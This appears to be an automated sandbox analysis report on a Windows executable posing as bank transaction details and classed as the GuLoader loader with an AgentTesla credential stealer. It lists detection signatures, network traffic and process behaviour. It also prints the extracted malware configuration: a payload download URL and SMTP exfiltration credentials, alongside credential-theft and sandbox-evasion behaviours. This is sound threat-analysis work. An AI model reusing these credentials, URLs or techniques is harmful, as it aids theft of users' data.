Windows Analysis Report PKO_TRANS_DETAILS_20211216_0809521.exe

Overview

General Information

Sample Name: PKO_TRANS_DETAILS_20211216_0809521.exe
Analysis ID: 540990
MD5: 1823b507e96d8138bada7c65d424abcc
SHA1: e5d7884da7d17ba0ae592ff787e84ae665e21c3a
SHA256: 99b81b452d173986229ed512383e05214f35c819aa9da4c2a972bb05c880d536
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1byST7nT"}
Source: PKO_TRANS_DETAILS_20211216_0809521.exe.2888.2.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ahmed.kendrick@yandex.comprisonbreak22smtp.yandex.com"}
Multi AV Scanner detection for submitted file
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Virustotal: Detection: 20% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49838 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1byST7nT
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.88.21.158 77.88.21.158
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-10-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49847 -> 77.88.21.158:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49847 -> 77.88.21.158:587
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: Cookies.11.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000000B.00000003.330833250110.0000000021391000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330833381633.000000002139A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300002633.000000001DE57000.00000004.00000001.sdmp, Cookies.11.dr String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: Cookies.11.dr String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ca.crl0h
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330770323782.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286764371.0000000000DDD000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330770323782.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286764371.0000000000DDD000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmp String found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp String found in binary or memory: http://eVxhAq.com
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ca.cer09
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ycasha2.cer0
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp String found in binary or memory: http://smtp.yandex.com
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com0.
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmp String found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmp String found in binary or memory: http://yandex.ocsp-responder.com03
Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-10-docs.googleusercontent.com/
Source: CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-10-docs.googleusercontent.com/2
Source: CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo34
Source: CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840243016.0000000000DDD000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC
Source: CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC;
Source: CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/~
Source: CasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334299831843.000000001DE3A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330774864610.000000001CC31000.00000004.00000001.sdmp String found in binary or memory: https://ffT40WCIhVVniAbESQ.com
Source: CasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmp String found in binary or memory: https://ffT40WCIhVVniAbESQ.comt-
Source: CasPol.exe, 0000000B.00000002.334299040887.000000001DDB6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000B.00000002.334299040887.000000001DDB6000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-10-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49838 version: TLS 1.2

System Summary:

barindex
Uses 32bit PE files
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Code function: 2_2_00401E86 2_2_00401E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AD1130 11_2_00AD1130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00ADBA78 11_2_00ADBA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AD3A50 11_2_00AD3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AD4320 11_2_00AD4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00ADC7D8 11_2_00ADC7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AD3708 11_2_00AD3708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00F888C8 11_2_00F888C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00F8B1C5 11_2_00F8B1C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00F82D78 11_2_00F82D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FBACB0 11_2_00FBACB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FBF898 11_2_00FBF898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB0040 11_2_00FB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FBB004 11_2_00FBB004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB7D28 11_2_00FB7D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB5AD8 11_2_00FB5AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB1228 11_2_00FB1228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB9B18 11_2_00FB9B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB1EE0 11_2_00FB1EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FB67D0 11_2_00FB67D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FC52B0 11_2_00FC52B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FC5B91 11_2_00FC5B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FCB4A8 11_2_00FCB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FC8615 11_2_00FC8615
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FC3330 11_2_00FC3330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FCB49A 11_2_00FCB49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DB35D08 11_2_1DB35D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DB34394 11_2_1DB34394
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DB35CC1 11_2_1DB35CC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DB369D0 11_2_1DB369D0
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329866775514.0000000000425000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDagins.exe vs PKO_TRANS_DETAILS_20211216_0809521.exe
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Binary or memory string: OriginalFilenameDagins.exe vs PKO_TRANS_DETAILS_20211216_0809521.exe
PE file contains strange resources
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Virustotal: Detection: 20%
Source: PKO_TRANS_DETAILS_20211216_0809521.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\Roaming\u2trkkyb.crc Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe File created: C:\Users\user\AppData\Local\Temp\~DF96836616C4B0B991.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/4@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
